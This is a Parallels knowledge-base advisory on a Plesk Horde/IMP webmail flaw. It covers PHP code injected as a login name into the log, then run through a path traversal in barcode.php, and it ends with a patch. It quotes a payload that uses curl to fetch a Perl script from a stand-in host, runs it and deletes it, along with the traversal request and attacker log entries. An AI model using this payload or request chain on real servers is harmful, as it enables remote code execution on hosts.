Search

Language:  
Search for:

Available article translations:

Horde/IMP Plesk Webmail Exploit

APPLIES TO:
  • Parallels Plesk 9.3 for Linux/Unix
  • Parallels Plesk 9.2 for Linux/Unix
  • Parallels Plesk 9.0 for Linux/Unix
  • Parallels Plesk 8.6 for Linux/Unix
  • Parallels Plesk 9.3 for Windows
  • Parallels Plesk 9.2 for Windows
  • Parallels Plesk 9.0 for Windows
  • Parallels Plesk 8.6 for Windows

Symptoms

The Horde/IMP package (3.1.7-3.3.2) that is shipped with Plesk v. 8.x and earlier versions of 9.x (before 9.5.4) has a vulnerability that allows an attacker to run malicious software by passing the login to the webmail with a POST request to the /horde/imp/redirect.php file that includes the PHP code as the username. For example:
 
<?php passthru("cd /tmp;curl -O -s http://domain.tld/new.txt;perl new.txt;rm -rf new.txt"); ?>

 
This results in the PHP code being logged to the /var/log/psa-horde/psa-horde.log file, which, due to a vulnerability in the barcode.php file, allows attackers to cause Horde to execute the code by making this request:
 
/horde/util/barcode.php?type=../../../../../../../../../../../var/log/psa-horde/psa-horde.log

 
Here is what the actual requests the attacker uses and the log entry from the psa-horde.log file would look like:
 
66.240.226.25 - - [17/Jan/2012:08:01:19 -0500] "POST /horde/imp/redirect.php HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5"
66.240.226.25 - - [17/Jan/2012:08:01:35 -0500] " /horde/util/barcode.php?type=../../../../../../../../../../../var/log/psa-horde/psa-horde.log%00 HTTP/1.1" 200 13160 "1" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5"
Jan 17 08:01:35 HORDE [error] [imp] FAILED LOGIN 66.240.226.25 to localhost:143[imap/notls] as <?php passthru("cd /tmp;curl -O -s http://domain.tld/new.txt;perl new.txt;rm -rf new.txt"); ?>@casanh.org [on line 258 of "/usr/share/psa-horde/imp/lib/Auth/imp.php"]

Resolution

Download the appropriate patch for Horde 3.1.7-3.3.2 in accordance with the platform your server runs on. Unzip it, and place the file in the corresponding folder:

Linux:
/usr/share/psa-horde/lib/Horde/  - [ patch ]

Windows:
%plesk_vhosts%\webmail\horde\lib\Horde\ - [ patch ]


Attachments:


f1ea5d9407b679b92bed375cb9324c65 c81e59b61af9dca603ba03b14aabe968 42844a8183c58f5bd71c7d59929707e6 3e2cae805d7531c06d01f2df5398114f e8cbf2a9b109849cd9de80cfc0e0582d db229c4740d60cf9f63ce5e5f42872fc 6247aaf63a64298429d85623a734b5dd 22d986bd49b9a6e1ba95956db2a14466 096219f1ba3f9ed7b5fcb848354b8215 9f8baf78266b4e54525d1c6bf06305a5 12c6f6bd6775cb701defb57d79fe96f6 5b3062eb55e955d8ca8051339fb09f69 7f4fd8df3573236a1cfaa861f2289640 bdfc2fcfd33015dce037e3597d1fb50c 8d9286f5cc87aae919f2a1703e913854 56797cefb1efc9130f7c48a7d1db0f0c

FEEDBACK
Was this article helpful?
Tell us how we may improve it.
Yes No
 
 
 
 
 
 
Desktop Virtualization
- Parallels Desktop 9 for Mac
- Parallels Transporter
- Parallels Desktop Switch to Mac Edition
- Parallels Desktop for Mac Enterprise Edition
- Parallels Management-Mac for Microsoft SCCM
Server Virtualization
- Parallels Cloud Server
- Parallels Containers for Windows 6.0 Beta
- Parallels Virtuozzo Containers
Automation
- Parallels Automation
- Parallels Automation for Cloud Infrastructure
- Parallels Business Automation Standard
- Parallels Virtual Automation
- Parallels Plesk Panel Suite
- Web Presence Builder
- Parallels Plesk Automation
- Parallels Small Business Panel
- Value-added Services for Hosters
- Parallels Partner Storefront
Services & Resources
- Cloud Acceleration Services
- Professional Services
- Support Services
- Training & Certification